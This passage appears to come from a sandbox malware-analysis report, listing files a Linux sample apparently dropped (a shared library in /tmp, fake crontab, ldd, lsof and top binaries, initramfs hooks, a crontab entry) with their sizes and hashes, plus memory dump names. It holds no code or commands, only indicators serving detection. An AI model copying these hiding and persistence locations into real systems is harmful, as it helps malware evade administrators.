                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                2113d7db30ec0147647f4350c01e011b89340ece

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                743b4869cc49a3a614af3619e9574d14cfbb3c8db4840918931d9fe16caf00dc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                e0c5b607b6325aa633001dbbdf4a42d57c3cff32dabe45e6d271f3d9fc40a4c64c0095a4e484e65c982f79e8593e2e6bfac1ad49e5f0244cca762eeaa23cda45

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/libgcwrap.so

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                78KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                835a9a6908409a67e51bce69f80dd58a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                dfa0024b534410f9121d5842526ca47c086b0ea1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                a6d3c6b6359ae660d855f978057aab1115b418ed277bb9047cd488f9c7850747

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                7ea02787dc582d374c36a43e86485aac9940ef031a686f5db4c7f587899b038f12275bca3fd802615499ac6414ff3e9c324114cfcfa01a99f2d5970a6de0e52b

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/.local/bin/crontab

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c65e7bdf676bb1617301efce4b51a409

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                9f1ed8a688c5fd7e3822734496347d301a33c9eb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                9a61ee4face85eefbff2e1f66ce2bed035bc7e3bb4829ec2c4dfe4121c1d29a2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c223416d0ad506390b518828fa19f6868241f9fb81d407d432a1c63cc7196ac3f6fcfe577a514432c055871b29be322fceb492d55c36f79c5070f53ec299cf78

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/.local/bin/ldd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                cf265a3a3dd068d0aa0c70248cd6325d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                263b31723094af0799f915718921df19a9eec822

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                db81c115407267801b7c32bd3da0533306c7c586a82839ffe324e8794e3dcc01

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                a144c7f7e195e98751eb7823443c7a114aba9dffeff82668f6b10d65fc25704d6da607fa30f286a37ea6cd5e6c70a495b635cf211bca38dffa50aa19843f0eb8

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/.local/bin/lsof

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                2053098ddcf12ccea2af8c2c180278e5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c862b42d01280cba1bf310bdf586cf56dc3218d9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1a695a4202ab5d7797f7bbbc434c56775f1524d7622cd54a0bcbf5b032af7e6a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                568943ea186e923efc8a23427c34b8b09aa66ed1f7d18b280c51f3d7ccabae0dabf5db9265dac53d61e9f524b45d1d65375f7300b3950cefe1d0f108d9da73ab

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/.local/bin/top

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                da006a0b9b51d56fa3f9690cf204b99f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4d3a4f916aeb9234c3de1423330fa8b0ec3e2518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                b48fef6f8eee0ce98994573068bf50bd0b3a61d81f9d1f76bf70b633159f1435b8d26a814d97583293909aa439b2bdbb24256e4f119966a3af72b0c05a013972

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/wizlmsh

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                10KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ba120e9c7f8896d9148ad37f02b0e3cb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3b78dbcac10c3c3bcb38a9aa077b8f62bdea5f2d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ca3f246d635bfa560f6c839111be554a14735513e90b3e6784bedfe1930bdfd6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                b6e483f4f32652d160707863537c959dc15237aebe9e6be9c2a468e28a9ca62869a05e5c4d2ae456aa93f1fc02329caeb1f84b3f52c67e193909b2317aed0690

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/share/initramfs-tools/hooks/sed3N6ijn

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5563cdf9bb54c6ae4229717204432dfc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                68c7516955eb2211332d806a60dacca719b788a6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                b5200138832cc6c770cf7ae5fa4a767917ad6c18df8b503925b8af4d3890de1b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c18bda8b88fd0171735e4c3cbdc68e521273d79b575f624aae1925c6e24b131926958eae4f3723ea02f258da4207604b6dd944225201175b12ab3752e9389e56

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/share/initramfs-tools/hooks/sedYbzyNC

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                68269c9675491475ac96497579439490

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                beb3cca1ea0e2139ee1c87729c0b47fc4f8d5c68

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                0bbb27851a302079d1244e4628b011561bbc499354a7ab34966208497b7094c0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                95220d53dbf8242c7370be9e35689f5a4d7337d64ae6fd523c2c082fdd9eb5199339024fe21d9d8ee80b04012549d285d7f9c6cea4e5dc73b493b12e93a72fe3

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /var/spool/cron/crontabs/tmp.RuiXWi

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                212B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ef6a5902a384449abf4f896bd454f648

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                164a690be6fbe0cb6dcf368bc4f817152644ce89

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                8ff427105fc11a502ec25c07d0e425c04802ac9a46803195b4994cf542edbce2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5857790c844a0f410db8a9603d03d0698506307d5770f043d037bc81aa374480ac5c61fb02e47f957680cd39dac0fbb3e974737abe0550ed22f8779494814370

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/2478-1-0x0000000000400000-0x0000000001722d48-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/2486-2-0x0000000000400000-0x0000000001722d48-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/2500-3-0x0000000000400000-0x0000000001722d48-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/3773-4-0x0000000000400000-0x0000000000ae87b8-memory.dmp